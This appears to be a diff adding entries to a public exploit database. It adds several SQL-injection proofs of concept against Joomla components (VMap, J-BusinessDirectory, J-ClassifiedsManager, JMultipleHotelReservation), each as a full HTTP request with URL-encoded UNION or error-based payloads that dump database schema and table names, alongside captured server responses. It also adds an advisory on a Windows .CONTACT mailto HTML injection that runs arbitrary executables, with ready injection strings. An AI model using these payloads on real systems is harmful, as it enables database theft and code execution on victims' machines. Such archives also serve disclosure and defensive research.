+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 322
+Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+csmodid=236&Itemid=303&keysearch=' union select (SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
+HTTP/1.1 500 You have an error in your SQL .....#__associations<br>0007: #__banner_clients<br>0008: #__banner_tracks<br>0009: #__banners<br>0010:X-Powered-By: PHP/5.6.16
+Date: Tue, 22 Jan 2019 19:04:29 GMT
+Server: Apache
+X-Logged-In: False
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Cache-Control: no-cache
+Pragma: no-cache
+Vary: Accept-Encoding
+Connection: close
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/46229.txt
+++ b/exploits/php/webapps/46229.txt
@ -0,0 +1,38 @@
+# Exploit Title: Joomla! Component VMap 1.9.6 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/vmap/
+# Version: 1.9.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=[SQL]&mapid=1
+# 
+
+GET /[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 500 XPATH syntax error:...
+Date: Tue, 22 Jan 2019 21:16:19 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.16
+X-Logged-In: False
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Cache-Control: no-cache
+Pragma: no-cache
+Vary: Accept-Encoding
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
--- a/exploits/php/webapps/46230.txt
+++ b/exploits/php/webapps/46230.txt
@ -0,0 +1,37 @@
+# Exploit Title: Joomla! Component J-BusinessDirectory 4.9.7 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cmsjunkie.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/
+# Version: 4.9.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=[SQL]&term=a
+# 
+
+GET /[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+HTTP/1.1 200 OK
+Date: Wed, 23 Jan 2019 15:45:13 GMT
+Content-Type: application/json
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=172800
+Expires: Fri, 25 Jan 2019 15:45:13 GMT
+Alt-Svc: h2=":443"; ma=60
+Server: cloudflare
+CF-RAY: 49da034bc2faba72-ATL
--- a/exploits/php/webapps/46231.txt
+++ b/exploits/php/webapps/46231.txt
@ -0,0 +1,44 @@
+# Exploit Title: Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cmsjunkie.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/j-classifiedsmanager/
+# Version: 3.0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/component/jclassifiedsmanager/
+# 
+
+&categorySearch=[SQL]
+&adType=[SQL]
+&citySearch=[SQL]
+
+POST /[PATH]/component/jclassifiedsmanager/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 779
+Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45 2%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads: undefined
+HTTP/1.1 500 Internal Server Error
+Date: Wed, 23 Jan 2019 15:06:56 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Cache-Control: no-cache
+Pragma: no-cache
+Alt-Svc: h2=":443"; ma=60
+Server: cloudflare
+CF-RAY: 49d9cb37b64998d7-LAX
--- a/exploits/php/webapps/46232.txt
+++ b/exploits/php/webapps/46232.txt
@ -0,0 +1,43 @@
+# Exploit Title: Joomla! Component J-MultipleHotelReservation 6.0.7 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cmsjunkie.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/
+# Version: 6.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels
+# 
+
+%31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%74%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a%3d%30%29,%28%40%74%62%6c%3a%3d%30%78%30%30%29%2c%28%73%65%6c%45%43%74%28%30%29%66%52%4f%6d%28%69%6e%66%6f%52%4d%41%54%69%6f%6e%5f%73%63%68%45%4d%61%2e%63%6f%4c%55%4d%6e%73%29%77%48%45%72%65%28%74%41%42%4c%65%5f%73%63%68%45%4d%61%3d%64%61%54%41%42%61%73%65%28%29%29%61%4e%64%28%30%78%30%30%29%69%6e%28%40%78%3a%3d%43%6f%6e%63%61%74%28%40%78%2c%69%66%28%28%40%74%62%6c%21%3d%74%41%42%4c%65%5f%6e%61%6d%65%29%2c%43%6f%6e%63%61%74%28%4c%50%41%44%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a=%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%30%33%64%33%65%2c%40%74%42%6c%3a%3d%74%41%42%4c%65%5f%6e%61%4d%65%2c%28%40%7a%3a%3d%30%78%30%30%29%29%2c%20%30%78%30%30%29%2c%6c%70%61%64%28%40%7a%3a%3d%40%7a%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%64%33%65%2c%30%78%34%62%36%66%36%63%36%66%36%65%33%61%32%30%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d
+
+POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 985
+Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; PHPSESSID=6c6c795380ae5a25888e1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefc
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
+HTTP/1.1 200 OK
+Date: Wed, 23 Jan 2019 15:14:32 GMT
+Content-Type: text/html; charset=utf-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Expires: Wed, 17 Aug 2005 00:00:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Last-Modified: Wed, 23 Jan 2019 15:14:32 GMT
+Alt-Svc: h2=":443"; ma=60
+Server: cloudflare
+CF-RAY: 49d9d658025e22c4-LAX
--- a/exploits/windows/local/46222.txt
+++ b/exploits/windows/local/46222.txt
@ -0,0 +1,82 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
+[+] ISR: ApparitionSec
+[+] Zero Day Initiative Program    
+[+] ZDI-CAN-7591
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft .CONTACT File
+
+A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
+This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
+
+
+[Vulnerability Type]
+Mailto: HTML Link Injection Remote Code Execution
+
+
+[Security Issue]
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is 
+vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that
+instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user.
+
+The E-mail addresses Mailto: will point to an arbitrary executable like.
+<a href="calc.exe">pwn@microsoft.com</a>
+
+Additionally the executable file can live in a sub-directory and be referenced like "<a href="mydir\malicious.exe">pwn@microsoft.com</a>" or attackers can use
+directory traversal techniques to point to a malware say sitting in the targets Downloads directory like:
+
+<a href="..\..\..\..\Users\victim\Downloads\evil.exe">pwn@microsoft.com</a>
+
+Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils.
+
+This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix
+for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields.
+
+This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known.
+
+
+[Exploit/POC]
+Create a Windows .CONTACT file and inject the following HTML into the E-mail: field
+
+<a href="calc.exe">pwn@microsoft.com</a>
+
+Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?"
+
+Click Yes.
+
+Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute.
+
+
+Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :)
+
+
+[POC Video URL]
+https://vimeo.com/312824315
+
+
+[Disclosure Timeline]
+Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
+Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019.
+https://www.zerodayinitiative.com/advisories/ZDI-19-121/
+Public disclosure : January 22, 2019
+	 
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10239,6 +10239,7 @@ id,file,description,date,author,type,platform,port
 46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux,
 46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,
 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
+46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40698,3 +40699,14 @@ id,file,description,date,author,type,platform,port
 46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
 46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,80
 46219,exploits/php/webapps/46219.txt,"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion",2019-01-22,"Ihsan Sencan",webapps,php,80
+46221,exploits/linux/webapps/46221.py,"Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation",2019-01-23,"Chris Lyne",webapps,linux,
+46223,exploits/php/webapps/46223.txt,"Joomla! Component vBizz 1.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46224,exploits/php/webapps/46224.txt,"Joomla! Component vBizz 1.0.7 - Remote Code Execution",2019-01-23,"Ihsan Sencan",webapps,php,80
+46225,exploits/php/webapps/46225.txt,"Joomla! Component vWishlist 1.0.1 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46226,exploits/php/webapps/46226.txt,"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46227,exploits/php/webapps/46227.txt,"Joomla! Component vReview 1.9.11 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46228,exploits/php/webapps/46228.txt,"Joomla! Component vRestaurant 1.9.4 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46229,exploits/php/webapps/46229.txt,"Joomla! Component VMap 1.9.6 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46230,exploits/php/webapps/46230.txt,"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
+46231,exploits/php/webapps/46231.txt,"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,
+46232,exploits/php/webapps/46232.txt,"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80